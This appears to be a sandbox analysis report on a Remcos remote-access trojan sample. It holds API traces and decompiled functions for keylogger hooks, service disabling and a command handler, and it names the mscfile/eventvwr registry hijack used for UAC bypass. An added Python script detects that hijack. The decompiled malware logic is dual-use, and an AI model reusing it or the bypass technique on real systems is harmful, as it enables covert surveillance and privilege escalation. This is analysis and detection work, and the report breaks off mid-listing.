                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040D928
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040D93A
                                  • atoi.MSVCRT ref: 0040D947
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D95E
                                  • atoi.MSVCRT ref: 0040D965
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040D97A
                                  • atoi.MSVCRT ref: 0040D981
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                    • Part of subcall function 004020F4: closesocket.WS2_32(0041BE70), ref: 004020F9
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@$??4?$basic_string@V01@V01@@closesocket
                                  • String ID:
                                  • API String ID: 2234106156-0
                                  • Opcode ID: 01ce1ee5bcc4171d1ab48e1a40778728093d77192bc5297049ba7dc6195948f0
                                  • Instruction ID: b6bede96aa3c2da0a069e28b117ba5bdb23d63fcfc1ec7a11f567b0dfa856408
                                  • Opcode Fuzzy Hash: 01ce1ee5bcc4171d1ab48e1a40778728093d77192bc5297049ba7dc6195948f0
                                  • Instruction Fuzzy Hash: 8C111C72A00218DBCB04BBF1EC599EE7769EB94355B00883EE512E71E1EF784909CB5D
                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000), ref: 00403224
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040322D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,000003E8,00000000), ref: 0040324D
                                    • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00403278
                                    • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                    • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                    • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                    • Part of subcall function 0040B708: RegSetValueExA.ADVAPI32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                    • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                    • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc), ref: 00403297
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@1@@$CloseValue$?length@?$basic_string@?size@?$basic_string@CreateOpenQuery
                                  • String ID: Software\Classes\mscfile\shell\open\command$origmsc
                                  • API String ID: 1883807236-2313358711
                                  • Opcode ID: ae895c2781c4a898e140f451f196115381b04db4d99b7ace2a8ac6b7857622d6
                                  • Instruction ID: 820ff65b2e21daf85941f98613c9b2fccc28e61cad3948ad9cf2f03c1057e28e
                                  • Opcode Fuzzy Hash: ae895c2781c4a898e140f451f196115381b04db4d99b7ace2a8ac6b7857622d6
                                  • Instruction Fuzzy Hash: E1110A72A40554B7DB0267A9DC55BEF7B6DCB85300F0040B6F905A72C1DA780B0647EE
                                  Uniqueness Score: -1.00%
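
                                  The key path Software\Classes\mscfile\shell\open\command, created under HKCU (0x80000001 in the RegOpenKeyExA call above) next to the string "origmsc", is the registry artifact of the mscfile handler override used against the auto-elevating eventvwr.exe; the report shows only the key being created and written, so the detection below does not rely on where the sample keeps the original command. As an added example that is not part of this report or of the sample's code, the Python below parses a .reg export (constructed sample data, made-up paths) and flags any per-user copy of the handler. All names, constants and the sample text are this example's own.

```python
"""Added example (not from the sandbox report or the Remcos code): parse a .reg
export and flag an HKCU override of the mscfile open handler.  Sample data is
constructed; paths are made up."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Key written by the sample, compared case-insensitively.
MSCFILE_COMMAND = r"software\classes\mscfile\shell\open\command"
# The stock handler: MMC from the system directory, followed by its arguments.
LEGIT_HANDLER = re.compile(r'^"?%systemroot%\\system32\\mmc\.exe"? ', re.IGNORECASE)

# Constructed export resembling what a hijack leaves behind (made-up path).
SAMPLE_HIJACKED = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command]
@="C:\\Users\\victim\\AppData\\Roaming\\remcos\\remcos.exe"
'''

# Constructed clean host: the handler exists only under HKLM.
SAMPLE_CLEAN = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mscfile\shell\open\command]
@="%SystemRoot%\\system32\\mmc.exe \"%1\" %*"
'''


@dataclass(frozen=True)
class Finding:
    hive: str
    key: str
    value_name: str
    data: str
    reason: str


def _unescape(s: str) -> str:
    """Undo .reg string escaping: \\\\ becomes \\ and \\" becomes "."""
    return re.sub(r'\\(["\\])', r"\1", s)


def parse_reg_export(text: str) -> Dict[Tuple[str, str], Dict[str, str]]:
    """Parse the REG_SZ subset of .reg syntax.

    Returns {(hive, key): {value_name: data}}; '' is the (Default) value.
    Other value types are skipped: the artifact is a plain command string.
    """
    out: Dict[Tuple[str, str], Dict[str, str]] = {}
    current = None
    value_re = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=("(?:[^"\\]|\\.)*")$')
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            hive, _, key = line[1:-1].partition("\\")
            current = (hive.upper(), key)
            out.setdefault(current, {})
            continue
        m = value_re.match(line)
        if m and current is not None:
            name = "" if m.group(1) == "@" else _unescape(m.group(1)[1:-1])
            out[current][name] = _unescape(m.group(2)[1:-1])
    return out


def find_mscfile_hijack(reg: Dict[Tuple[str, str], Dict[str, str]]) -> List[Finding]:
    """Flag a per-user mscfile handler.

    HKEY_CLASSES_ROOT merges HKLM and HKCU with HKCU taking precedence, and the
    stock handler lives only in HKLM, so any HKCU copy is suspicious by itself.
    A command that is not mmc.exe from %SystemRoot%\\System32 is called out too.
    """
    findings: List[Finding] = []
    for (hive, key), values in reg.items():
        if hive != "HKEY_CURRENT_USER" or key.lower().rstrip("\\") != MSCFILE_COMMAND:
            continue
        cmd = values.get("", "")
        reason = "mscfile open handler defined under HKCU"
        if cmd and not LEGIT_HANDLER.match(cmd):
            reason += "; command is not %SystemRoot%\\System32\\mmc.exe"
        findings.append(Finding(hive, key, "(Default)", cmd, reason))
    return findings


def check_live_hkcu() -> List[Finding]:
    """On Windows, read the live HKCU key and run the same check; no-op elsewhere."""
    import sys
    if sys.platform != "win32":
        return []
    import winreg
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                            r"Software\Classes\mscfile\shell\open\command") as k:
            cmd, _ = winreg.QueryValueEx(k, "")
    except OSError:
        return []
    return find_mscfile_hijack({("HKEY_CURRENT_USER", MSCFILE_COMMAND): {"": str(cmd)}})


if __name__ == "__main__":
    for f in find_mscfile_hijack(parse_reg_export(SAMPLE_HIJACKED)) + check_live_hkcu():
        print(f"{f.hive}\\{f.key} {f.value_name} = {f.data!r}: {f.reason}")
```

On a live host, feed the output of `reg export HKCU\Software\Classes\mscfile` to parse_reg_export, or call check_live_hkcu() directly; the HKCU key is absent on a clean system, so its mere existence is the signal, and the mmc.exe check only refines the reason.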

                                  C-Code - Quality: 19%
                                  			E00405CCA(struct HHOOK__** __ecx) {
                                  				char _v5;
                                  				char _v6;
                                  				void* _t9;
                                  				struct HHOOK__* _t16;
                                  				struct HHOOK__** _t30;
                                  
                                  				_push(__ecx);
                                  				_t30 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
                                  					_t9 = 0;
                                  				} else {
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v5);
                                  					E00405DD3(__ecx);
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  					E0041203B("[INFO]",  &_v6, "Online Keylogger Stopped",  &_v5, "Online Keylogger Stopped");
                                  					_t30[0xf] = 0;
                                  					_t6 =  &(_t30[0xd]); // 0x0
                                  					_t30[0xa] = 0;
                                  					CloseHandle( *_t6);
                                  					if(_t30[0xf] == 0) {
                                  						_t16 =  *_t30;
                                  						if(_t16 != 0) {
                                  							UnhookWindowsHookEx(_t16); // remove the hook (HHOOK at offset 0 of the object) used for keystroke capture
                                  							 *_t30 = 0;
                                  						}
                                  					}
                                  					_t9 = 1;
                                  				}
                                  				return _t9;
                                  			}

                                  Instruction addresses: 0x00405ccd to 0x00405d4f

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?,?,0040D1F8,0040D2A6,00000001), ref: 00405CE9
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?), ref: 00405D00
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405D14
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • CloseHandle.KERNEL32(00000000), ref: 00405D2B
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 00405D3D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V01@V10@$?c_str@?$basic_string@LocalTimeV10@@Y?$basic_string@$??4?$basic_string@?length@?$basic_string@CloseEventHandleHookUnhookV01@@V10@0@Windowsfreemallocprintfsprintf
                                  • String ID: Online Keylogger Stopped$[INFO]
                                  • API String ID: 2254939683-2146459034
                                  • Opcode ID: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                  • Instruction ID: 054b4bc7c437e62fba5109071e9382fc7819d51c50d88b2d3918446dea0eff9a
                                  • Opcode Fuzzy Hash: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                  • Instruction Fuzzy Hash: 7701F575600A04AFD710BB69DC898FFBBACEE85240340497FE84293241D779AD458FA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041046B
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410483
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041049B
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104B0
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104C3
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104DA
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104F1
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410508
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: InputSend
                                  • String ID:
                                  • API String ID: 3431551938-0
                                  • Opcode ID: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                  • Instruction ID: b328bb317d865897fc6c08efdded885432bfecfaa75727484ced0e6d4c13fc0d
                                  • Opcode Fuzzy Hash: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                  • Instruction Fuzzy Hash: F03121B1D5124EA9EB11EF949981FFFBFBCAF18301F504026E640B6142D3B446859BE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410020
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0041623C), ref: 00410095
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004100A0
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004100AC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100B5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100BE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004100F5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100FE
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@??1?$basic_string@$G@1@@V01@@$G@2@@0@Hstd@@V01@V10@V?$basic_string@Y?$basic_string@
                                  • String ID:
                                  • API String ID: 2253030544-0
                                  • Opcode ID: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                  • Instruction ID: 1aed4e64735882a0db0bb71c951f021fa06bcdcdb304fa8f35c3d61367e112a6
                                  • Opcode Fuzzy Hash: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                  • Instruction Fuzzy Hash: DE21DA7290111EEBDB509BA1DC88EEFBF7CEF19345F004166F50AE2050EB749689CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 48%
                                   			E00411927(void* _a4, signed char _a20) {
                                   				// Changes the start type of a named service. _a4 is the std::wstring service name
                                   				// (its c_str() result is passed to OpenServiceW); _a20 selects the new start type.
                                   				short* _t6;
                                   				signed int _t9;
                                   				void* _t14;
                                   				short* _t17;
                                   				int _t19;
                                   				void* _t21;
                                   				void* _t22;
                                   
                                   				_t17 = 0;
                                   				_t6 = OpenSCManagerW(0, 0, 2);  // 2 = SC_MANAGER_CREATE_SERVICE (the same value as the service access mask below)
                                   				_t22 = _t6;
                                   				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                   				_t21 = OpenServiceW(_t22, _t6, 2);  // 2 = SERVICE_CHANGE_CONFIG
                                   				if(_t21 != 0) {
                                   					_t19 =  &_a4 | 0xffffffff;  // 0xFFFFFFFF = SERVICE_NO_CHANGE, kept when _a20 is not 0, 1 or 2
                                   					_t9 = _a20 & 0x000000ff;
                                   					if(_t9 == 0) {
                                   						_push(4);  // 4 = SERVICE_DISABLED
                                   						goto L8;
                                   					} else {
                                   						_t14 = _t9 - 1;
                                   						if(_t14 == 0) {
                                   							_push(2);  // 2 = SERVICE_AUTO_START
                                   							goto L8;
                                   						} else {
                                   							if(_t14 == 1) {
                                   								_push(3);  // 3 = SERVICE_DEMAND_START
                                   								L8:
                                   								_pop(_t19);
                                   							}
                                   						}
                                   					}
                                   					// Only dwStartType is changed: dwServiceType and dwErrorControl are SERVICE_NO_CHANGE, every other field NULL.
                                   					_t17 = _t17 & 0xffffff00 | ChangeServiceConfigW(_t21, 0xffffffff, _t19, 0xffffffff, _t17, _t17, _t17, _t17, _t17, _t17, _t17) != 0x00000000;
                                   					CloseServiceHandle(_t22);
                                   					CloseServiceHandle(_t21);
                                   				} else {
                                   					CloseServiceHandle(_t22);
                                   				}
                                   				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                   				return _t17;  // nonzero when ChangeServiceConfigW succeeded
                                   			}










                                   Listing addresses: 0x0041192d to 0x004119ac

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,0041B310,?,?,00410FD9), ref: 00411933
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,00410FD9), ref: 00411940
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,00410FD9), ref: 00411948
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411955
                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00410FD9), ref: 00411986
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411998
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 0041199B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410FD9), ref: 004119A0
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ChangeConfigManager
                                  • String ID:
                                  • API String ID: 760094045-0
                                  • Opcode ID: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                  • Instruction ID: c2fa0ded83cb97236bb08be5de2499f982cdcb79c4471a71361dcbc3e7912862
                                  • Opcode Fuzzy Hash: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                  • Instruction Fuzzy Hash: 2201D2B1120528BAE6001B709C99EFB3F5CEF453B0B044226F632961E0CA644D81C9E9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 28%
                                   			E00401A5E(intOrPtr* __eax, void* __eflags, void* _a8) {
                                   				// Command handler. E004129EB splits the command string at the separator stored at
                                   				// 0x41b310 into _v20/_v36; the command id read from *__eax (_t39) is then tested against 0x9b.
                                   				char _v20;
                                   				char _v36;
                                   				void* _t18;
                                   				void* _t20;
                                   				intOrPtr _t39;
                                   
                                   				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                   				_t39 =  *__eax;
                                   				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                   				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                   				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                   				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                   				_t18 = _t39 - 0x9b;
                                   				if(_t18 == 0) {
                                   					// Command 0x9b: sets the flag at 0x41b288 and hands the E0040180C(&_v20, 0) result to E004020C2 with id 0x9c.
                                   					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C( &_v20, __eflags, 1));
                                   					 *0x41b288 = 1;
                                   					_t20 = E0040180C( &_v20, __eflags, 0);
                                   					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                   					E004020C2(0x41b240, 0x9c, _t20);
                                   				} else {
                                   					if(_t18 == 0) {  // Decompilation artifact (quality 28%): repeats the test above, so this branch is dead as written.
                                   						E00401B26();  // Builds the ' /sort "Visit Time" /stext ' command line listed under its subcall APIs below.
                                   					}
                                   				}
                                   				E004017DD( &_v20);
                                   				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                   				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                   				return 0;
                                   			}








                                   Listing addresses: 0x00401a68 to 0x00401b25

                                  APIs
